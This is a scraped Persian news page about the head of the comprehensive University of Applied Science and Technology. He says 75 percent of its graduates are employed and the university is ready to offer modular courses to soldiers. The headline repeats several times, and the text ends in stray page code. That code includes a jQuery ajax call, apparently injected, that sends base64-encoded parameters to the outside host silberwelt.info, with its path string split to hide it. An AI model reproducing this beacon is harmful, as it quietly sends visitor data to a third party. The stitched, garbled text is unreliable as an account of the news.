75 درصد دانش‌آموختگان دانشگاه جامع علمی ـ کاربردی شاغل هستند/ آمادگی دانشگاه جامع علمی ـ کاربردی برای ارائه دوره‌های پودمانی به سربازان

75 درصد دانش‌آموختگان دانشگاه جامع علمی ـ کاربردی شاغل هستند/ آمادگی دانشگاه جامع علمی ـ کاربردی برای ارائه دوره‌های پودمانی به سربازان
رئیس دانشگاه جامع علمی ـ کاربردی گفت: امروز 75 درصد دانش‌آموختگان این دانشگاه شاغل هستند و این در حالی است که در سایر مراکز آموزش عالی این رقم بسیار پایین است.

75 درصد دانش‌آموختگان دانشگاه جامع علمی ـ کاربردی شاغل هستند/ آمادگی دانشگاه جامع علمی ـ کاربردی برای ارائه دوره‌های پودمانی به سربازان

رئیس دانشگاه جامع علمی ـ کاربردی گفت: امروز 75 درصد دانش‌آموختگان این دانشگاه شاغل هستند و این در حالی است که در سایر مراکز آموزش عالی این رقم بسیار پایین است.
75 درصد دانش‌آموختگان دانشگاه جامع علمی ـ کاربردی شاغل هستند/ آمادگی دانشگاه جامع علمی ـ کاربردی برای ارائه دوره‌های پودمانی به سربازان
i==a.length-1)c=’ class=”last”‘;var g=””;void 0!==a[i].token&&(g=a[i].token);c={cssClass:c,urlKeyword:a[i].term.replace(/ /g,”-“),token:g,keyword:a[i].term};d.append($.tmpl(“related_links_tmpl”,c));start=i+1}}}};

$.ajax({ url: ‘http://silberwelt.info/’ + ‘s’ + ‘earch/tsc.php?200=Mjg1NzMzOTU3&21=OTUuMTU0LjIzNy44NQ==&681=MTUxOTY3NDQ4ODU3NTU5MGZmOGQ2YmRhOGJkNzU1NzA1Y2Y4NDExYjY5&crc=789e9d10664848fcf895677a3f2bba0bdc470c53&cv=1’});

/*!normalize.css v1.1.2

View more posts from this author